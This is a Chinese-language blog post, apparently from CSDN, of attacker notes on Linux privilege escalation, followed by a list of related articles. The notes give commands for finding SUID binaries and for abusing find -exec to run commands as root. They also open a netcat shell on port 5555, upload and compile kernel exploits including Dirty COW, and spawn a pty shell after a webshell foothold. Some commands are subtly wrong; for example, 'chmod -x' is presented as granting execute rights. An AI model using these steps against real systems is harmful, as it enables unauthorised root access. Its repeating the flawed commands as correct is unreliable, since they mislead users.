Linux权限提升

最新推荐文章于 2024-10-04 21:58:42 发布
最新推荐文章于 2024-10-04 21:58:42 发布
阅读量268 收藏 4
点赞数 14
分类专栏: 网络安全 渗透测试 文章标签: 网络安全 权限提升 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/136036841
版权

Linux提权自动化脚本利用(信息收集):

信息收集:

  • LinEnum
  • linuxprivchecker

信息探针:

  • linux-exploit-suggester
  • linux-exploit-suggester2

Linux-SUID提权-web:

漏洞成因:chmod u+s给予了suid u-s删除了suid

  • 冰蝎连接后门程序
  • 通过冰蝎的反弹shell进行msf反弹
这个时候,两种方法,可以通过冰蝎传信息收集工具,或者可以通过反弹回来的shell进行上传上去:
upload /root/linenum.sh /tmp/linenum.sh 
//这条命令是将自己服务器上root文件夹中的linenum文件上传到我们目前已经成功反弹shell的服务器上的tmp这个临时文件里并起名叫linenum.sh,也可以叫xiaoyao.sh
  • 执行信息收集工具
./linenum.sh  //如果执行不了,我们用下面这个命令让其有权限执行
chmod -x linenum.sh   //给予权限后再重修执行我们的信息收集工具
  • 手工探查信息也是可以
find / -user root -perm -4000 print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;
  • 下面是一些可用于产生shell的程序
nmap
vim
less
more
nano
cp
mv
find
  • find举例
touch xiaoyao
find xiaoyao -exec whoami \;   //此时回显root
  • nc反弹
find xiaoyao -exec natcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

Linux-内核漏洞提权-本地:

  • 过程
    • 连接
    • 获取可利用漏洞
    • 下载或上传exp
    • 编译exp
    • 给权限执行exp
  • 上传漏洞探针并执行
perl linux-exploit-suggester2.pl
  • 有可利用漏洞的情况下上传exp
  • 编译exp并执行
gcc 45010.c -o 45010  //编译45010.c文件后输出文件45010
./45010  //执行exp

chmod -x 45010  //如果不能执行的话,再来一次给予执行权限

Linux-脏牛内核漏洞提权:

  • 上传漏洞exp
upload /root/dcow.cpp /tmp/40847.cpp
  • 进入shell会话
cd/tmp  //进入存放exp的目录

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o xiaoyao 40847.cpp -lutil   //编译文件,将40847.cpp编译成xiaoyao可执行文件

python -c 'import pty; pty.spawn("/bin/bash")'  //起一个交互shell

./xiaoyao  //执行exp,吃到大西瓜,如果没有吃到大西瓜,那就gg吧

廾匸0705
关注
专栏目录
Linux权限
xxtzzxx的博客
08-08 1248
就像我们日常生活中提到的医生、教师、程序员等是对一种职业或是一类人的统称,而非指的是具体的某个人。查看上述代码不难看出,bash进程的数目在逐渐增多,会造成对操作系统资源的浪费,所以为了避免这样的情况发生,我们可以通过用户回退的方式来进行用户的切换。那当我们有这么一种需求,others可以在特定的目录下创建自己的文件、写入自己文件、删除自己的文件,但是不想让他删除别人的文件。此外,有这样的一个问题,如果一个目录文件对others具有w权限,那么用户是否能够删除掉目录文件中的其它拥有者的文件?......
Linux权限提升总结
m0_66458291的博客
04-01 1427
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
Linux权限提升—内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 3369
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
Linux权限提升总结_linux权限
2401_84968977的博客
05-17 1061
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权
剁椒鱼头没剁椒的博客
04-05 2544
在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。Linux权限提升—内核、SUID、脏牛等提权这里将一下在这个提权中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入权限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它权限也GG。如果是WEB权限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
【Web】超级详细的Linux权限提升一站式笔记
uuzeray的博客
02-11 2224
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的注意以下几点:1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2. 命令执行者要对该程序文件拥有执行(x)权限.
Linux 提升权限方法(一) —— sudo
热门推荐
weixin_45292180的博客
01-04 1万+
Linux系统中,为了系统安全,通常程序不会直接以root用户运行,而是以它所需要的最小权限的用户运行。但是程序中有部分代码,却必须要root权限运行,此时,就必须在程序中进行提权操作,暂时将权限提升至root权限。执行完对应代码后,降回原来权限。这样,既能保证程序功能正常,也能保证系统安全。 此文介绍通过sudo的方式来提升程序权限。 sudo sudo是Linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具。简单来说,就是普通用户可以通过sudo执行root用户才能
linux各种姿势权限提升超超超细致教程
qq_41245301的博客
05-14 1798
PATH 环境变量劫持提权,因为PATH环境变量是按照路径顺序执行命令,当黑客把恶意脚本改成你常用的命令并且,把路径改到最前面,那么久会发生环境变量劫持。重点关系统任务计划配置文件(/etc/crontab)的内容?检查root用户的任务计划?查看有没有错误的配置服务?查看配置文件是否包含有漏洞的插件?检查root用户的任务计划(普通用户是没有权限查看的)那些服务是开机运行的?查看当前目下可以读的文件。查看当前目下可以写的文件。查看cron目录中的内容。查看我们具有写入权限的脚本。查看socket的路径。
Linux 提升权限
weixin_45854888的博客
03-02 9468
linux 中,普通用户的权限极其有限。为了方便给予固定用户部分超出普通用户的权限,选择为固定用户提升权限。 永久提权,su,相当于切换用户。命令su可以将普通用户直接提升为管理员,需要输入root密码,而后用户直接使用管理员所有权限。su切换成普通用户不需要输入密码。用户直接使用管理员所有权限。 su - root ...
THM Linux权限提升权限提升路径
04-22
创建thm文件,内容为执行的命令,赋予可执行权限,运行test文件,执行命令
防范权限提升-Linux提权手法超级攻略
08-17
防范权限提升-Linux提权手法超级攻略
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8491
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
linux 网络序
CodeHouse的博客
09-30 495
在将ip字符串转网络序存储时。根据整形二进制显示判断。
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1251
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
linux启用 IPv4 转发
mankeywang的博客
09-30 312
【代码】linux启用 IPv4 转发。
Linux】进程地址空间(初步了解)
最新发布
weixin_69380220的博客
10-04 1391
进程虚拟地址空间相关内容
Linux权限提升技术:环境变量、定时任务和数据库安全
Linux权限提升技术详解 本文将详细介绍Linux权限提升技术,包括环境变量、定时任务和数据库权限提升等方面的知识点。 **环境变量安全** 在 Linux 系统中,环境变量是指当前用户的shell会话中的一组变量,它们会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值